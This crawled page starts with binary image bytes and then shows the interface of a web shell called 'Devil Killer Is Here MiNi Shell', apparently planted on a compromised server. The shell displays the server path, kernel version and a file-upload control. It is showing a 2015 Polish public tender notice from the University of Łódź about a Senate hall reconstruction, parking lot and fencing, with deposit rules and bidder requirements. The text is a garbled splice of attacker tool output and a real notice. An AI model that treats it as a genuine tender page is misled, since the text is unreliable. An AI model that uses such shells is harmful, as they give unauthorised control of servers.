JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150108/4122-N-2015.html

<p class="kh_header"><b>Łódź: Przebudowa  Sali Posiedzeń Senatu Uniwersytetu Łódzkiego wraz z wykonaniem  parkingu  i stylowego ogrodzenia przy ul. Narutowicza 68 i Narutowicza 65   w Łodzi</b><br>
<b>Numer ogłoszenia: 4122 - 2015; data zamieszczenia: 08.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Łódzki , ul. Narutowicza 65, 90-131 Łódź, woj. łódzkie, tel. 42 635 43 54, faks 42 635 43 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  Sali Posiedzeń Senatu Uniwersytetu Łódzkiego wraz z wykonaniem  parkingu  i stylowego ogrodzenia przy ul. Narutowicza 68 i Narutowicza 65   w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac polega na przebudowie istniejącego  parterowego budynku przylegającego do dawnego Gmachu Szkoły Zgromadzeniu Kupców  mieszczącego  Sale Posiedzeń Senatu Uniwersytetu Łódzkiego  w tym na  :
Wykonaniu nowej aranżacji wnętrza Sali Posiedzeń Senatu UŁ i pozostałych pomieszczeń objętych opracowaniem , kompleksowej wymianie  instalacji technicznych niezbędnych do prawidłowego funkcjonowania  obiektu obejmującej wykonanie  projektowanej instalacji elektrycznej , niskoprądowej,  instalacji  wodociągowej  i kanalizacyjnej oraz  instalacji mechanicznej i grawitacyjnej 
Opis budynku:
Dane całego obiektu:
Powierzchnia netto 262,80m2
Kubatura 2 141,31m3
szer.x dł 22,81 m x 15,81 m
Wysokość budynku 8,47 m
Liczba kondygnacji 1 
Budynek jest wpisany do Rejestru   zabytków nieruchomych woj. łódzkiego pod numerem A/95


SALA POSIEDZEŃ SENATU
Przebudowa istniejącego parterowego budynku na Salę Posiedzeń Senatu UŁ, która obejmuje:
wykonanie nowej aranżacji wnętrza Sali posiedzeń Senatu i pozostałych pomieszczeń objętych opracowaniem;
wykonanie robót konstrukcyjnych: osadzenie nadproży nad otworami drzwiowymi, przesunięcie istniejących podciągów w oś istniejących łuków, wykonanie konstrukcji wsporczych pod obudowy wewnętrzne, wzmocnienie ścian poprzez zazbrojenie rys.
przewidziany dokumentacją remont konstrukcji dachu został już wykonany i nie wchodzi do zakresu przetargu;
kompleksowa wymiana instalacji teletechnicznych niezbędnych do prawidłowego funkcjonowania obiektu obejmująca wykonanie:
- instalacji elektrycznej: odgromowej, instalacji oświetlenia (w tym awaryjnego), gniazd elektrycznych, instalacji siły i sterowania dla centrali wentylacyjnej na dachu łącznika;
- instalacji niskoprądowej: system sygnalizacji pożaru, system sygnalizacji włamania i napadu, system telewizji przemysłowej, system kontroli dostępu, sieć strukturalna, system Audio, system multimedialny;instalacja wentylacji - montaż kanałów nawiewno-wywiewnych podłączonych do już zamontowanej centrali wentylacyjnej ustawionej na dachu łącznika. 
instalacja wod-kan w pomieszczeniu socjalnym;
wyposażenie Sali Senatu i pokoju socjalnego w meble  zgodnie z załącznikiem 8b ;

Wykonanie projektu Parkingu i zagospodarowanie  terenu wraz z wykonaniem ogrodzenia i wiaty śmietnikowej  przy Rektoracie Uniwersytetu Łódzkiego w Łodzi przy ul. Narutowicza 68  zgodnie z  programem  funkcjonalno - użytkowym 

Zakres prac :
1.	Uzyskanie  decyzji o warunkach zabudowy ( jeżeli będzie wymagane)
2.	Sporządzenie aktualnej mapy do celów  projektowych 
3.	Sporządzenie projektu budowlano- wykonawczego  z przedmiarami, kosztorysem  inwestorskim oraz Specyfikacją  techniczną wykonania  i odbioru
4.	Uzyskanie  prawomocnej decyzji o pozwoleniu na budowę
5.	Wykonanie wszystkich robót budowlano -instalacyjnych wynikających z opracowanego  projektu parkingu i zagospodarowania  terenu wraz z ogrodzeniem i wiatą śmietnikową
cała konstrukcja stalowa ogrodzenia powinna być zabezpieczona ocynkiem ogniowym

Projekt budowlano - wykonawczy powinien zostać sporządzony na bazie załączonej koncepcji przewidującej łącznie  71  miejsc parkingowych i uwzględnić odwodnienie  i oświetlenie parkingu (12 - toma  lampami na słupach ) Przekroje konstrukcyjne parkingu, dróg  i chodników  należy przyjąć zgodnie z załączonym rysunkiem nr 1 z przekrojami. projekt bud.-wyk powinien być zbieżny z załączonym zestawieniem ilości elementów parkingu.
Projekt bud.-wyk. należy opracować w  4 - ch  egzemplarzach w wersji papierowej  i 1 egz. w wersji  elektronicznej. Przedmiary , kosztorys inwestorski i STWiOR należy opracować  1 egzemplarzach w wersji papierowej i 1 egz. w wersji elektronicznej - Zakres prac należy wycenić w arkuszu kalkulacyjnym  -  Załącznik nr 8A

Wykonanie Parkingu i zagospodarowanie  terenu wraz z wykonaniem ogrodzenia  przy Rektoracie Uniwersytetu Łódzkiego w Łodzi przy ul. Narutowicza 65  obejmuje: 
budowę zjazdu publicznego
 budowę miejsc postojowych dla samochodów osobowych w ilości 52 szt. wraz z alejami dojazdowymi
budowę utwardzeń terenu (ciągów pieszych, jezdnych  na posesji przy ul. Narutowicza 65)
wykonanie rozbiórek istniejących utwardzeń terenu i kolidującego z projektowanym zagospodarowaniem terenu budynku gospodarczego znajdującego się na posesji przy ul. Narutowicza 65
zagospodarowanie terenów zielonych
budowę ogrodzenia terenu wraz z bramą wjazdową i furtką pieszą - cała konstrukcja gotowa  ogrodzenia powinna być zabezpieczona ocynkiem ogniowym
budowę instalacji oświetlenia terenu oraz instalację elektryczną zasilania i sterowania szlabanem oraz brama wjazdową
budowę instalacji kanalizacji deszczowej
zabezpieczenie istniejących na terenie sieci, instalacji telekomunikacyjnych 
Zakres prac należy wycenić w arkuszu kalkulacyjnym  -  Załącznik nr 8A
Przedmiary - załącznik nr 5 

Zakres prac dla Pakietu nr 2

Połączenie  budynków Narutowicza 65 i 68 oraz Uniwersytecka  3/5  do sieci teletechnicznej UŁ zgodnie z załączonymi  przedmiarami załącznik nr 8 a pakiet nr 2 
Jest to podłączenie rezerwowe w relacji Narutowicza 65 - 68 studnia przy budynku Uniwersytecka 3,
połączenia światłowodowe, rezerwowe pomiędzy głowicą Lodman na budynku Rektoratu do pomieszczenia serwerowni  w budynku Narutowicza 68,  kabel częściowo przechodzi kanalizację istniejącą - wymagane jest  rozbudowanie o ok. 91 metrów 86 m po terenie UŁ , 5 m po terenie  obcym. Nowo wybudowana  kanalizacja rozłożona będzie w studni istniejącej przy budynku Uniwersyteckiej 3. Początek budowanej kanalizacji teletechnicznej test  w studni na rogu ul. Narutowicza  Uniwersytecka  , która jest własnością LODMAN 

Termin wykonania 15.05.2015
Wycena według załączonego   załącznik nr  8a   -   Pakiet nr 2 

Prace należy realizować zgodnie z dokumentacja techniczną i Aneksem do projektu oraz przedmiarami robót ujętych w załączniku  nr 5 do siwz i wyposażyć pomieszczenia zgodnie z załącznikiem nr 8b .
 Jednocześnie wszystkie  prace  Pakietu nr  1 oraz Pakietu nr 2 należy wycenić zgodnie z załącznikiem nr 8a.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 71.22.00.00-6, 71.42.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
Każdy Wykonawca przystępujący do niniejszego postępowania musi wnieść wadium przetargowe w wysokości 81 900,00 zł (słownie zł: osiemdziesiąt tysięcy ).
Jednakże całość wadium Wykonawca zobowiązany jest wpłacić w przypadku, gdy składa ofertę na wszystkie części przedmiotu zamówienia, określonego w SIWZ tj. zał. 8a  . Jeżeli Wykonawca składa ofertę na tylko jedną część przedmiotu zamówienia opisanego wyżej, wówczas jest on zobowiązany do wpłaty wadium jedynie za część, na którą składa on ofertę. Kwoty wadium do poszczególnych części zamówienia zostały określone w załączniku nr 9 do niniejszej SIWZ. Wpłacona przez wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez zamawiającego. 

Wpłacona przez Wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez Zamawiającego.
Wadium należy wnieść najpóźniej do dnia ostatecznego terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
  Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy.
Wadium wnoszone w formach innych niż w pieniądzu, winno być złożone w formie oryginału w siedzibie zamawiającego (oddzielnie od oferty) - Biuro Inwestycji i Nieruchomości  UŁ, ul. Lindleya 3, 90-131 Łódź, pok.2126A w godz. 7.30 - 15.30.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego.
Nr konta Uniwersytetu Łódzkiego: 
Bank Polska Kasa Opieki S.A. II Oddział w Łodzi, ul. Piotrkowska 270, 
nr 86 1240 3028 1111 0000 2822 2488.
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zgodnie z art.46 ust.3 ustawy - prawo zamówień publicznych, zamawiający w wyznaczonym terminie będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art.46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na       warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
przyczyn leżących po stronie wykonawcy.
UWAGA:
1) Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 23.01.015 r. , do godz. 10:00
2) Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
3) Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium na wymagany okres związania ofertą według zasad określonych w specyfikacji, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.
4) W przypadku przedłużenia okresu związania ofertą, wykonawca musi jednocześnie przedłużyć okres ważności wadium albo jeżeli nie jest to możliwe wnieść nowe wadium na przedłużony okres związania ofertą.
5) W pozostałych przypadkach mają zastosowanie przepisy dotyczące wadium wynikające</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ad. 2	Posiada w wykazie następujące roboty budowlane wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
a) Co najmniej 1 robotę budowlaną plegającą na przebudowie pomieszczeń w obiekcie zabytkowym o powierzchni minimum 250m 2 zawierających elementy zabudowy  , grzejników, ścian i sufitów płytami meblowymi o wartości co najmniej  1 400 000,00zł  netto dla pakietu nr 1 
b)Co najmniej 1 robotę budowlaną obejmującej wykonanie robót polegających na  utwardzeniu powierzchni jezdnej  na kwotę 700 tys. PLN netto  o powierzchni użytkowej nie mniejszej niż 2 000 m2  - dla pakietu nr - 1
c)Co najmniej jedną robotę o wartości minimum 200 tys. PLN netto polegającej na wykonaniu ogrodzenie z przęsłami stalowymi na podmurówce żelbetowej o długości  co najmniej 300 mb  dla pakietu nr - 1
Załączenie dowodów dotyczących najważniejszych robót (spełniające w/w wymogi zamawiającego), określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
UWAGA:	w przypadku wykonawców, którzy realizowali roboty budowlane w innych walutach niż PLN, Zamawiający przeliczy wartość netto tych robót po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.
Dowodami, są:
   1) poświadczenie,
   2) w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
3. W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane, wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
4. W razie konieczności, szczególnie gdy wykaz lub dowody, budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ad.3)  Posiada w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  informację zamieścić w załączniku nr 3. tj.: dla pakietu nr 1 
kierownika budowy branża budowlana z uprawnieniami budowlanymi - minimum 4 lat  doświadczenia w kierowaniu robotami budowlanymi w okresie ostatnich minimum 5 lat,
kierownika robót branża elektryczna z uprawnieniami elektrycznymi - minimum 4 lat doświadczenia w kierowaniu robotami  elektrycznymi w okresie ostatnich minimum 5 lat.

wykonawca powinien posiadać w zespole osobę dysponującą uprawnieniami do prowadzenia prac w obiektach zabytkowych zgodnie z wymogami określonymi w § 8 ust.1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków (Dz. U. Nr 150, poz. 1579)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ad.4 Potwierdzi w informacji  banku lub spółdzielczej kasy oszczędnościowo- kredytowej, wysokość posiadanych  środków finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 400 000 zł (słownie: czterysta tysięcy złotych), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  w przypadku składania ofert dla pakietu nr  1
w przypadku złożenia oferty tylko na pakiet nr 2 warunek nie obowiązuje 

UWAGA: w przypadku wykonawców, którzy wykażą środki finansowe lub zdolność kredytową w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.
Ad 4. Wykonawca wykaże w opłaconej polisie, a w przypadku jej braku w innym dokumencie potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 400 000,00zł. (słownie: czterysta tysięcy złotych ). w przypadku składania oferty dla pakietu nr 1 
UWAGA: w przypadku wykonawców, którzy przedstawią opłaconą polisę lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu. 
Przed podpisaniem umowy Wykonawca przedstawi Inwestorowi również ubezpieczenie od odpowiedzialności cywilnej wystawione na okres trwania umowy na budynek i teren Narutowicza 68 oraz teren Narutowicza 65 w Łodzi</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

